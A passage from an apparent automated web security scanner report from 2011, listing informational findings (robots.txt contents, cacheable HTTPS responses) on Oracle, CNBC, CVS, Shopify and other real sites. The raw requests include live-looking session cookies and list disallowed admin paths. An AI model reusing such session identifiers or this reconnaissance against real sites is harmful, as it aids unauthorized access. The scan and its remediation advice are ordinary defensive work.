Host:	http://www.readwriteweb.com
Path:	/enterprise/2010/11/oracle.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:44 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Wed, 07 Jul 2010 16:50:17 GMT
ETag: "207-48acef6e5e440"
Accept-Ranges: bytes
Content-Length: 519
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# robots.txt for http://www.readwriteweb.com/

User-agent: *
Disallow: /test/
Disallow: /new/
Disallow: /42/
Disallow: /cgi-bin/

User-agent: Googlebot-Image
Disallow: /

User-agent: 008
Disallow: /

...[SNIP]...

26.123. http://www.sapient.com/en-us/about-sapient/alliances/atg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/alliances/atg.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 125
Content-Type: text/plain
Last-Modified: Mon, 11 Oct 2010 06:10:07 GMT
Accept-Ranges: bytes
ETag: "89d3d6f3a69cb1:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

User-agent: *
Disallow: /admin
Disallow: /awards

# Sitemap Auto-Discovery
Sitemap: http://www.sapient.com/sitemap.xml

26.124. http://www.shopify.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopify.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Content-Type: text/plain
Last-Modified: Thu, 06 Jan 2011 22:15:23 GMT
Vary: Accept-Encoding
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 189
Date: Tue, 06 Sep 2011 15:32:10 GMT
X-Varnish: 1687907071
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /paypal-shopify/
Disallow: /paypal/
Disallow: /behance/draft1/

26.125. http://www.sophelle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sophelle.com

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: text/plain
Last-Modified: Mon, 26 Oct 2009 18:49:57 GMT
Accept-Ranges: bytes
ETag: "d3bc1a1d6d56ca1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:25:59 GMT
Connection: close

User-agent:*
Allow:/
Sitemap: http://www.Sophelle.com/Sitemap.xml

26.126. http://www.tenzing.com/atg-ecommerce-hosting.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/atg-ecommerce-hosting.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tenzing.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 375
Content-Type: text/plain
Last-Modified: Wed, 01 Jun 2011 10:49:24 GMT
Accept-Ranges: bytes
ETag: "a24687924920cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT
Connection: close

User-agent: *
Disallow: /everest-cloud.asp
Disallow: /atg/
Disallow: /cloud/
Disallow: /forms/
Disallow: /saas/
Disallow: /tenzing/
Disallow: /training/
Disallow: /webinar/
Disallow: /whitepa
...[SNIP]...

26.127. http://www.volusion.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volusion.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.volusion.com

Response

HTTP/1.1 200 OK
Content-Length: 423
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2011 19:28:40 GMT
Accept-Ranges: bytes
ETag: "ac6f9954b67cc1:1612"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:01 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Sitemap: http://www.volusion.com/sitemap.xml
Disallow: /announcements/2009_10_21.asp
Disallow: /announcements/2011/
Disallow: /test/
Disallow: /tem
...[SNIP]...

26.128. http://www.youtube.com/v/JWMKXb1Guq4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/v/JWMKXb1Guq4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:34:00 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

26.129. http://www.znode.com/znode-multifront/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.znode.com
Path:	/znode-multifront/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.znode.com

Response

HTTP/1.1 200 OK
Content-Length: 290
Content-Type: text/plain
Last-Modified: Fri, 13 May 2011 19:55:50 GMT
Accept-Ranges: bytes
ETag: "7a3a55c2a711cc1:3e07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:05 GMT
Connection: close

User-agent: *
Disallow: /Admin/*
Disallow: /Activate/*
Disallow: /diagnostics.aspx
Disallow: /IntegrationTest.aspx
Disallow: /Data/Default/Logs/*
Disallow: /webservices/*
Disallow: /PlugIns/*

...[SNIP]...

26.130. http://www2.znode.com/analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.znode.com
Path:	/analytics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:10 GMT
Server: Apache
Last-Modified: Wed, 26 Mar 2008 21:11:01 GMT
ETag: "1a"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:10 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
X-Pardot-LB: lb-s2
Connection: close

#User-agent: *
#Disallow:

27. Cacheable HTTPS response previous next
There are 41 instances of this issue:

https://bugzilla.mozilla.org/show_bug.cgi
https://deloitte.zettaneer.com/Subscriptions/
https://dne.oracle.com/pls/uns/OPT_OUT.th
https://event.on24.com/eventRegistration/prereg/register.jsp
https://forms.netsuite.com/core/media/media.nl
https://forums.oracle.com/forums/category.jspa
https://forums.oracle.com/forums/guestsettings!default.jspa
https://forums.oracle.com/forums/main.jspa
https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
https://forums.oracle.com/forums/themes/english/resources/info_company.gif
https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
https://forums.oracle.com/forums/themes/english/resources/otn_new.css
https://forums.oracle.com/forums/themes/english/resources/s_code.js
https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
https://forums.oracle.com/forums/themes/english/resources/spacer.gif
https://forums.oracle.com/forums/themes/english/resources/style.css
https://login.cnbc.com/
https://login.cnbc.com/cas/checkCasTicket
https://login.oracle.com/oam/server/sso/auth_cred_submit
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
https://myprofile.oracle.com/EndUser/images/fading-background.png
https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
https://myprofile.oracle.com/EndUser/jscripts/s_code.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js
https://register.cnbc.com/
https://register.cnbc.com/email/EmailSupport.jsp
https://shop.oracle.com/pls/ostore/f
https://support.oracle.com/
https://support.oracle.com/CSP/ui/blank.html
https://support.oracle.com/CSP/ui/flash.html
https://support.oracle.com/CSP/ui/xml/sunConnect.html
https://www.atg.com/dojo-1/dijit/nls/loading.js
https://www.atg.com/favicon.ico
https://www.cvs.com/CVSApp/html/blank.html
https://www.cvs.com/CVSApp/user/forgot_password.jsp
https://www.cvs.com/CVSApp/user/login.jsp

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

27.1. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.2. https://deloitte.zettaneer.com/Subscriptions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://deloitte.zettaneer.com
Path:	/Subscriptions/

Request

GET /Subscriptions/ HTTP/1.1
Host: deloitte.zettaneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.3. https://dne.oracle.com/pls/uns/OPT_OUT.th previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://dne.oracle.com
Path:	/pls/uns/OPT_OUT.th

Request

GET /pls/uns/OPT_OUT.th HTTP/1.1
Host: dne.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.4. https://event.on24.com/eventRegistration/prereg/register.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://event.on24.com
Path:	/eventRegistration/prereg/register.jsp

Request

GET /eventRegistration/prereg/register.jsp HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Content-Length: 61
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close

Missing clientid parameter

27.5. https://forms.netsuite.com/core/media/media.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/core/media/media.nl

Request

GET /core/media/media.nl?id=1363615&c=NLCORP&h=f5dd9535de84fa5de3cb&_xt=.js HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
Referer: https://forms.netsuite.com/app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315341196|session#1315341135013-154927#1315342996|PC#1315341135013-154927.19#1316550738; JSESSIONID=fHTcTm9CBLMJTHFQWbd8qqd81sbXKBcbnK8jsyHgY5NlMPHvvBHKrmGY0yLgRhCZjP6LNPZLjV0XY1NCNpVg6LvVX6517ztFTY6nvnmjQQ7bddV4GnyHHGHM5pCXsFhy!1517314966; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:10 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 23042
Content-Disposition: inline;filename="mbox.js"
NS_RTIMER_COMPOSITE: -110591142:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=996
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "© 2004-2007 Offermatica ™ Corporation";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f = null
...[SNIP]...

27.6. https://forums.oracle.com/forums/category.jspa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/category.jspa

Request

Response

27.7. https://forums.oracle.com/forums/guestsettings!default.jspa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/guestsettings!default.jspa

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.8. https://forums.oracle.com/forums/main.jspa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/main.jspa

Request

Response

27.9. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/feed-icon-14x14.jpg

Request

Response

27.10. https://forums.oracle.com/forums/themes/english/resources/info_company.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/info_company.gif

Request

Response

27.11. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/oralogo_small.gif

Request

Response

27.12. https://forums.oracle.com/forums/themes/english/resources/otn_new.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/otn_new.css

Request

Response

27.13. https://forums.oracle.com/forums/themes/english/resources/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code.js

Request

Response

27.14. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code_forums.js

Request

Response

27.15. https://forums.oracle.com/forums/themes/english/resources/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/spacer.gif

Request

Response

27.16. https://forums.oracle.com/forums/themes/english/resources/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/style.css

Request

Response

27.17. https://login.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:30 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Sun, 03 Dec 2006 16:39:34 GMT
ETag: "e000c-49-423b5e0c67d80"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/html

<script>
window.location="https://login.cnbc.com/index.jsp";
</script>

27.18. https://login.cnbc.com/cas/checkCasTicket previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/checkCasTicket

Request

GET /cas/checkCasTicket HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:30 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en
Content-Length: 118
Connection: close
Content-Type: text/xml;charset=ISO-8859-1

<?xml version="1.0" encoding="ISO-8859-1"?>

<cnbc-global-login-response>1</cnbc-global-login-response>

27.19. https://login.oracle.com/oam/server/sso/auth_cred_submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Request

Response

27.20. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/pls/orasso/orasso.wwsso_app_admin.ls_login

Request

Response

27.21. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/faces/profile/createUser.jspx

Request

GET /EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186570323291081,0)
Content-Length: 40292

<script id="scr10" type="text/javascript" src="/EndUser/jscripts/s_validation.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html d
...[SNIP]...

27.22. https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/faces/profile/findUsername.jspx

Request

GET /EndUser/faces/profile/findUsername.jspx HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195250452335963,0)
Content-Length: 8380

<script id="scr10" type="text/javascript" src="/EndUser/jscripts/s_validation.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html d
...[SNIP]...

27.23. https://myprofile.oracle.com/EndUser/images/fading-background.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/fading-background.png

Request

Response

27.24. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/logo-oracle-red.png

Request

Response

27.25. https://myprofile.oracle.com/EndUser/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code.js

Request

Response

27.26. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_popup.js

Request

Response

27.27. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_profile.js

Request

Response

27.28. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_validation.js

Request

Response

27.29. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/portal/dwr/interface/PortalAjax.js

Request

GET /portal/dwr/interface/PortalAjax.js HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcrj6SogYwvr-3-LC-it

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:15 GMT
Content-Length: 1726

// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (PortalAjax == null) var PortalA
...[SNIP]...

27.30. https://register.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.31. https://register.cnbc.com/email/EmailSupport.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/email/EmailSupport.jsp

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.32. https://shop.oracle.com/pls/ostore/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.oracle.com
Path:	/pls/ostore/f

Request

GET /pls/ostore/f?p=700:2:0::NO:RP,2:PROD_HIER_ID:4509881204651805720002 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/community/developer-vm/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343714603; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Ftechnetwork%2Fcommunity%2Fdeveloper-vm%2Findex.html; s_sq=oracleotnlive%2Coracleglobal%3D%2526pid%253Dotn%25253Aen-us%25253A%25252Fcommunity%25252Fdeveloper-vm%25252F%2526pidt%253D1%2526oid%253Dotn%25253Aen%25253Ahnav%25253Astore%25253Astoredatabase%25253Astoredatabaseseeall%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:20 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 515
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head><script type="text/javascript">
function detectTimeZone(){
var lGmtHours = -(new Date()).getTimezoneOffset();
var lHours = parseInt(lGmtHours/60);
var lMinutes = lGmtHours%60;
window.loca
...[SNIP]...

27.33. https://support.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/

Request

GET / HTTP/1.1
Host: support.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:16 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecb-9f-4aa5b4f3d35c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 159
Keep-Alive: timeout=15, max=1799
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<HTML>
<HEAD>
<title>Oracle Configuration Support Manager</title>
<meta http-equiv="REFRESH" content="0;url=/CSP/ui/flash.html"></HEAD>
<BODY>
</BODY>
</HTML>

27.34. https://support.oracle.com/CSP/ui/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/CSP/ui/blank.html

Request

GET /CSP/ui/blank.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: https://support.oracle.com/CSP/ui/flash.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
